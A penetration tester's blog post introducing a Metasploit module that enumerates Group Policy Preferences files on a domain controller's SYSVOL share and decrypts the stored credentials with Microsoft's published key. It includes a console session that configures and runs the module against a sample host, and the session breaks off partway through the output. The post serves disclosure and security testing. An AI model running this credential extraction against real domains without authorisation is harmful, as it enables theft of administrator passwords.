Over the past few months I’ve had a chance to clean up some code that we’ve used internally for penetration testing for some time now. This code was built to demonstrate the weaknesses of using Group Policy Preferences (GPP) to store and distribute local or domain credentials.
Group Policy Preferences is a method that system administrators can use to create new accounts and/or update account credentials for domain-joined systems. The problem with this method is two-fold. First, Microsoft decided to encrypt the credentials (for Group Policy Preferences) using a single/non-unique secret key. In other words, this key is the same for all Windows 2008 Domain Controllers (DC). Second, they decided to publish the secret key on MSDN. This allows anyone with knowledge of the secret key to decrypt stored credentials that are identified.
Microsoft has since published a blog post alerting administrators to the risks of using GPP to manage credentials. Only normal user domain credentials are required to access the SMB SYSVOL share (where the GPP files live on the DC). Leveraging this access, we can read GPP XML files and decrypt stored credentials using the known private key.
We have found that many organizations store local admin, domain service, and even Domain Admin account credentials using GPP. The module that I submitted to the Metasploit Github repo provides the ability to enumerate GPP credentials as a domain user with access to the SMB share on the DC. Extracted credentials will be stored in the Metasploit creds tables.
-- CODE lang-shell --msf > use auxiliary/scanner/smb/smb_enum_gpp
msf auxiliary(smb_enum_gpp) > set SMBUSER jsmith
SMBUSER => jsmith
msf auxiliary(smb_enum_gpp) > set SMBPASS Password1!
SMBPASS => Password1!
msf auxiliary(smb_enum_gpp) > set SMBDOMAIN ACME
SMBDOMAIN => ACME
msf auxiliary(smb_enum_gpp) > set RHOSTS 10.10.10.10
RHOSTS => 10.10.10.10
msf auxiliary(smb_enum_gpp) > show options
Module options (auxiliary/scanner/smb/smb_enum_gpp):
Name Current Setting Required Description
–––––––– –––––––––––––––––––––––––––––– –––––––––––––––– ––––––––––––––––––––––
RHOSTS 10.10.10.10 yes The target address range or CIDR identifier
RPORT 445 yes The Target port
SMBDomain ACME no The Windows domain to use for authentication
SMBPass Password1! no The password for the specified username
SMBSHARE SYSVOL yes The name of the share on the server
SMBUser jsmith no The username to authenticate as
STORE true no Store the enumerated files in loot.
THREADS 1 yes The number of concurrent threads
msf auxiliary(smb_enum_gpp) > run
DOMAIN CONTROLLER 10.10.10.10
CHANGED 2010-01-01 12:00:00